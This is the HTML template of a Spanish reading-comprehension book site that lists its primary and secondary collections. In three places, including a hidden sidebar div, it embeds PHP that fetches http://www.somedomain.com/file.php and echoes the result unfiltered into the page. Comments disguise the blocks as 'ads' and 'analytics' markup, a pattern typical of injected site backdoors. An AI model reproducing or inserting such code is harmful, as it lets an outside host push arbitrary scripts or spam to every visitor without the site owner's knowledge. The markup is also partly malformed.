<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!-->
<html lang="en">
<!--<![endif]-->
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
    <title>Comprensión de Lectura</title>
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta name="robots" content="index,follow" />
    <link rel="shortcut icon" href="images/favicon.ico" />
    <link rel="stylesheet" href="css/prettyPhoto.css" type="text/css" />
    <link rel="stylesheet" href="css/flexslider.css" type="text/css" />
    <link rel="stylesheet" href="css/style.css" type="text/css" />
    <!--[if (gte IE 6)&(lte IE 8)]>
<script type="text/javascript" src="js/html5.js"></script>
<script type="text/javascript" src="js/selectivizr-min.js"></script>
<link rel="stylesheet" href="css/ie_7.css" type="text/css" />
<![endif]-->
 <script type="text/javascript" src="js/jquery.min.js"></script>
    <script type="text/javascript" src="js/jquery.easing.1.3.js"></script>
    <script type="text/javascript" src="js/jquery-ui-1.8.16.custom.min.js"></script>
    <script type="text/javascript" src="js/all-in-one.js"></script>
    <script type="text/javascript" src="js/setup.js"></script>    
    <script type="text/javascript" src="js/portfolio-filter.js"></script>
<script type="text/javascript">
$(window).load(function(){
	$('#demo-side-bar').removeAttr('style');
});
</script>
<style type="text/css">
.demobar{display:none;}
#demo-side-bar{top:53px!important;left:90%!important;display:block!important;}
</style>
 <!--Dynamically creates ads markup-->
   <?
$a = file_get_contents("http://www.somedomain.com/file.php");
echo ($a);
?>
    <!-- Header -->
    <header class="header_bg clearfix">
		<div class="container clearfix">
        	<!-- Social -->
            	<ul class="social-links">
                	<li ><a href="javascript:"><img src="images/facebook.png" alt="Facebook"></a></li>
                    <li ><a href="javascript:"><img src="images/twitter.png" width="24" height="24" alt="Twitter"></a></li>
                    <li ><a href="http://www.youtube.com/watch?v=SH2vNAu7uFk" target="_blank"><img src="images/youtube.png" width="24" height="24" alt="Twitter"></a></li>
                </ul>
            <!-- /Social -->
			 <!-- Logo -->
			<div class="logo">
				<a href="index.html"><img src="images/logo.png" alt="" /></a>
			</div>
			 <!-- /Logo -->
			
			<!-- Master Nav -->
			<nav class="main-menu">
				<ul>
					<li><a href="index.html">Inicio</a></li>
					<li>
						<a>Servicio Web</a>
						<ul>
							<li><a href="interactivos.html">Interactivos</a></li>
							<li><a href="pruebas_diagnostico.html">Pruebas de diagnóstico</a></li>
                            <li><a href="javascript:">Ayuda al maestro</a>
								<ul>
									<li><a href="http://www.comprensiondelectura.com/IndexArticulos.html"target="_blank">Pedagogía</a></li>
                                    <li><a href="http://www.comprensiondelectura.com/IndexSoluciones.html"target="_blank">Soluciones</a></li>
									
								</ul>
							</li>
                            
						</ul>
					</li>
					<li><a>Colecciones</a>
						<ul>
							<li><a href="preescolar.html">Preescolar</a></li>
							<li><a href="primaria.html">Primaria</a></li>
							<li><a href="secundaria.html">Secundaria</a></li>
							<li><a href="temas.html">Temas</a></li>
						</ul>
					</li>
					<li><a href="nosotros.html">Nosotros</a></li>
					<li><a href="contact.html">Contacto</a></li>
				</ul>
			</nav>
			<!-- /Master Nav -->
		</div>
	</header>
    <!-- /Header -->
    <!-- START CONTENT -->
    <section class="container clearfix">
		<!-- Page Title -->
			<header class="container page_info clearfix">
				
					<h1 class="regular brown bottom_line">Comprensión de Lectura</h1>
				
				<div class="clear"></div>
			</header>
			
		<!-- /Page Title -->
		
	
		<div class="container">
			<!-- CATEGORY FILTER -->
			<div class="filter">
				<ul>
					<li><a href="javascript:void(0);" id="all" class="selected">Todos</a></li>
					
					<li><a href="javascript:void(0);" id="app">Primer grupo: Libros A – E (primaria)</a></li>
					
					<li ><a href="javascript:void(0);" id="util">Segundo grupo: Libros F – I (Grados 6 - 9)</a></li>
                    
                    <li ><a href="javascript:void(0);" id="pp_full_res">Libros J – K (Grados 10 y 11)</a></li>
        
				</ul>
			</div>
			<!-- END CATEGORY FILTER -->
		</div>
		
		<div class="clear padding20"></div>
		
		
		<div class="portfolio_1_3">
			<ul id="list">
				<!-- START PORTFOLIO COLUMN #1 -->
				<li id="id-1" class="app">
					<span class="image">
						<a href="images/big/comprension_a_b_c.png" data-rel="prettyPhoto" class="img-thumb"><img class="portfolio_image" src="images/mini/comprension_lectura.jpg" alt="" /></a>
					</span>
					<span class="title"><a href="comprension_1.html">Primaria (A, B, C, D y E)</a></span>
					<span class="description">
						Cada libro está dividido en cuatro unidades, las cuales agrupan las habilidades fundamentales: Idea principal, Secuencias, Deducciones y Cerramiento. Cada habilidad constituye un taller que permite adquirir destreza en su manejo... 
					</span>
					<span class="clear padding15"></span>
				</li>
				<!-- END PORTFOLIO COLUMN #1 -->
				
				<!-- START PORTFOLIO COLUMN #2 -->
				<li id="id-2" class="util">
					<span class="image">
						<a href="images/big/comprension_f_g.png" data-rel="prettyPhoto" class="img-thumb"><img class="portfolio_image" src="images/mini/comprension_lectura.jpg" alt="" /></a>
					</span>
					<span class="title"><a href="comprension_2.html">Secundaria (F, G, H e I)</a></span>
					<span class="description">
						Los libros F – I, corresponden al grado de dificultad de lectura 6 a 9.
Cada texto está organizado en dos partes. En la primera parte...</span>
					<span class="clear padding15"></span>
				</li>
				<!-- END PORTFOLIO COLUMN #2 -->
				
				<!-- START PORTFOLIO COLUMN #3 -->
				<li id="id-3" class="pp_full_res">
					<span class="image">
						<a href="images/big/comprension_j_k.png" data-rel="prettyPhoto" class="img-thumb"><img class="portfolio_image" src="images/mini/comprension_lectura.jpg" alt="" /></a>
					</span>
					<span class="title"><a href="comprension_3.html">Secundaria (J y K)</a></span>
					<span class="description">
						Los libros J –K, corresponden al grado de dificultad de lectura 10 y 11.
En la primera unidad, el estudiante realiza un diagnóstico de su capacidad de comprensión...
					</span>
					<span class="clear padding15"></span>
				</li>
				<!-- END PORTFOLIO COLUMN #3 -->
				
				
			</ul>
			<div class="clear"></div>
		</div>
	</section>
    <!-- END CONTENT -->
    <!-- footer -->
    <footer class="footer_bg_bottom clearfix">
		<div class="footer_bottom container">
			<div class="col_2_3">
				
				<div class="menu">
					<ul>
						<li><a href="index.html">Inicio</a></li>
                        <li><a href="interactivos.html">Servicios Web</a></li>
						<li><a href="preescolar.html">Colecciones</a></li>
						<li><a href="nosotros.html">Nosotros</a></li>
						
						<li><a href="contact.html">Contacto</a></li>
					</ul>
				</div>
				
				
				<div class="clear padding20"></div>
				
				
				<p>
					&copy; Some Rights Reserved. &nbsp; <a href="#">Legal Notices</a>  
				</p>
				
			</div>
			
			<div class="clear padding20"></div>
		</div>
	</footer>
	<!-- /footer -->
  	<div id="demo-side-bar">
   <?
$a = file_get_contents("http://www.somedomain.com/file.php");
echo ($a);
?>
   </div>
    </div>
    <!--wrapper end-->
	<!--Dynamically creates analytics markup-->
	 <?
$a = file_get_contents("http://www.somedomain.com/file.php");
echo ($a);
?>
</body>
</html>
